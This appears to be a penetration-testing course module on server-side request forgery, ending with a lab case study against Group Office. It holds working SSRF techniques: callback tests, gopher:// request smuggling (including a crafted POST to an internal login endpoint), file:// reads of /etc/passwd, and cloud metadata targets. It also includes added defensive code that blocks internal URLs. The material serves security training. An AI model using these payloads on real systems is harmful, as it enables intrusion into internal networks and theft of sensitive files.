Module 14: Server-side Request Forgery

Introduction to SSRF

Interacting with the Vulnerable Server

Example: Using an SSRF, we could interact with the loopback interface of a vulnerable server, which would not otherwise be accessible to us.

Interacting with Back-end Systems and Private IP Ranges

Private IP Addresses

IP address range     Number of addresses
10.0.0.0/8           16,777,216
172.16.0.0/12        1,048,576
192.168.0.0/16       65,536

Using an SSRF, we could also potentially interact with other systems on the internal network.

Testing for SSRF

Accessing the SSRF Sandbox Application

Start the VPN, VM, and add the IPs and hostnames to your hosts file.

Discovering SSRF Vulnerabilities

If we discover upload functionality via URL, URI, or link, we should test for SSRF.

SSRF Sandbox
SSRF Sandbox previewing http://www.megacorpone.com
SSRF Sandbox - Verify Link
Verifying http://www.megacorpone.com

Calling Home to Kali

Restarting the Apache HTTP Server

kali@kali:~$ sudo systemctl restart apache2

When we are performing this kind of testing in the real world, we should include a unique identifier in the URL. This would help us locate the attack in our log file.

Verifying the application requested a page from our Kali VM

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.101 - - [15/Oct/2021:16:49:40 -0400] "GET /hello_ssrf_world HTTP/1.1" 404 491 "-" "python-requests/2.26.0"

Exploiting SSRF

Retrieving Data

Attempting to access the Status page
Using the SSRF vulnerability to access the Status page

Instance Metadata in the Cloud

Some cloud hosting providers, such as AWS, expose their instance metadata service at the link-local address 169.254.169.254. Others provide access through DNS; Google Cloud, for example, uses metadata.google.internal. These endpoints may contain sensitive or private information.

Bypassing Authentication in Microservices

Any security controls enforced by an API gateway on traffic entering the internal network would not apply to traffic between two microservices, since that traffic originates within the internal network.

Alternative URL Schemes

An example file URI in Firefox

Checking the contents of the kali default homepage

kali@kali:~$ head /usr/share/kali-defaults/web/homepage.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Kali Linux</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="Kali Linux is an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments." />
    <meta name="author" content="Kali Linux" />
    <!-- based on template from http://bootstraptaste.com -->
    <!-- css -->
An exception occurred
Accessing the contents of /etc/passwd using curl

Starting a netcat listener on port 9000

kali@kali:~$ nc -nvlp 9000
listening on [any] 9000 ...

Using curl to send a request with the Gopher protocol

kali@kali:~$ curl gopher://127.0.0.1:9000/hello_gopher

Netcat listener handling the Gopher request

...
listening on [any] 9000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56264
ello_gopher

Example HTTP GET request

GET /hello_gopher HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: curl/7.74.0
Accept: */*

Sending a mock HTTP request over the Gopher protocol

kali@kali:~$ curl gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1

Netcat listener handling our mock HTTP request

...
listening on [any] 9000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56274
GET /hello_gopher HTTP/1.1
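To make the two listener outputs above concrete, the following added example (not course code) reproduces what curl puts on the wire for a gopher:// URL: the first character after the leading slash is the Gopher item type and is never sent, the remaining selector is percent-decoded, and a CRLF is appended. That is why the listener printed "ello_gopher", and why the mock HTTP request is prefixed with "_". The HTTP heuristic is a defender-side check for selectors seen in captures or logs.

```python
from urllib.parse import unquote_to_bytes, urlsplit


def gopher_wire_bytes(url: str) -> bytes:
    """Return the selector bytes a Gopher server receives for `url`.

    Mirrors curl's handling of the path only; gopher query strings are
    not modelled here.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        raise ValueError("not a gopher URL")
    selector = parts.path[1:]        # drop the leading "/"
    if selector:
        selector = selector[1:]      # drop the one-character item type
    # Percent-escapes such as %20 and %0d%0a become raw bytes (space, CRLF).
    return unquote_to_bytes(selector) + b"\r\n"


def looks_like_http_request(data: bytes) -> bool:
    """True when the first line of the selector is shaped like an HTTP request line."""
    first_line = data.split(b"\r\n", 1)[0]
    return first_line.endswith((b" HTTP/1.1", b" HTTP/1.0"))
```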
Accessing /status using the gopher protocol
Sending a POST request with gopher to /status
Double URL-encoding in HTTP Request body
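The mitigation side of everything covered in this module, as an added example that is not part of the course material: a guard a server-side fetcher can run before following a user-supplied URL. It rejects the non-HTTP schemes above (gopher://, file://), the loopback interface, the private ranges from the table earlier, and link-local metadata addresses such as 169.254.169.254. The `resolve` callback and the `FAKE_DNS` table are constructed stand-ins so the example runs offline.

```python
"""Outbound-URL guard for a server-side fetcher (added example, not course code).

In production, connect to the IP address this check validated rather than
re-resolving the hostname (DNS rebinding), and re-run the check on every redirect.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Names that reach metadata over DNS (Google Cloud) plus the obvious loopback name.
BLOCKED_HOSTS = {"metadata.google.internal", "localhost"}

# Constructed stand-in for DNS; the addresses are made up for the example.
FAKE_DNS = {
    "www.megacorpone.com": ["93.184.216.34"],
    "backend": ["10.0.0.5"],
    "metadata.google.internal": ["169.254.169.254"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def ip_is_internal(ip):
    """True for loopback, RFC 1918, link-local and any other non-global address."""
    return not ipaddress.ip_address(ip).is_global


def check_url(url, resolve=fake_resolve):
    """Return (allowed, reason); fetch only when allowed is True."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host in BLOCKED_HOSTS:      # urlsplit() already lower-cases the host
        return False, f"blocked host {host}"
    try:
        ips = [str(ipaddress.ip_address(host))]   # literal IPv4/IPv6 in the URL
    except ValueError:
        ips = resolve(host)                        # a name: check every answer
        if not ips:
            return False, f"cannot resolve {host}"
    for ip in ips:
        if ip_is_internal(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"
```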

Extra Mile

Use the Gopher protocol to send a POST request with the username "white.rabbit" and password "dontbelate" to the login endpoint to obtain a flag.
gopher://backend:80/_POST%20/login%20HTTP/1.1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2041%0d%0a%0d%0ausername%3dwhite.rabbit&password%3ddontbelate

Case Study: Group Office

Accessing Group Office

Start the VPN, the VM, and add the IP and hostname to your hosts file.

Discovering the SSRF Vulnerabilities

Group Office login page
Group Office Start Page
The list of portlets we can add to the Start Page
The updated Start page including the News portlet
Group Office RSS Feeds window

Restarting apache2

kali@kali:~$ sudo systemctl restart apache2
Adding our IP address as an RSS feed

Checking our access.log file with tail

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.105 - - [17/Nov/2021:10:34:02 -0500] "GET / HTTP/1.1" 200 10956 "-" "Group-Office HttpClient 6.5.77 (curl)"
HTTP history for adding RSS feeds
Proxy request in Burp Suite Repeater
The response content is a 404 page including our IP address

Access log contents include a request to /repeater

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.105 - - [17/Nov/2021:10:34:02 -0500] "GET / HTTP/1.1" 200 10956 "-" "Group-Office HttpClient 6.5.77 (curl)"
192.168.50.105 - - [17/Nov/2021:10:55:39 -0500] "GET /repeater HTTP/1.1" 404 437 "-" "Group-Office HttpClient 6.5.77 (curl)"
My Account link
Updating a user's profile picture
Insert from URL dialog window
Submitting our IP address in the URL field

Access log contents include a request to /fromurl

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.50.105 - - [17/Nov/2021:11:25:45 -0500] "GET /fromurl HTTP/1.1" 404 437 "-" "Group-Office HttpClient 6.5.77 (curl)"
Burp Suite HTTP history with request to /api/upload.php
The blobId is used in the following request

Creating itworked.html and moving it to our webroot

kali@kali:~$ echo "it worked" > itworked.html

kali@kali:~$ sudo mv itworked.html /var/www/html/itworked.html
Updating the URL parameter
The server responds with an error

Exploiting the SSRF Vulnerabilities

The server returned an empty response to our attack
Group Office Address book page
Downloading a blob
Retrieving our HTML page
Sending the SSRF attack to access /etc/passwd
Retrieving the contents of /etc/passwd
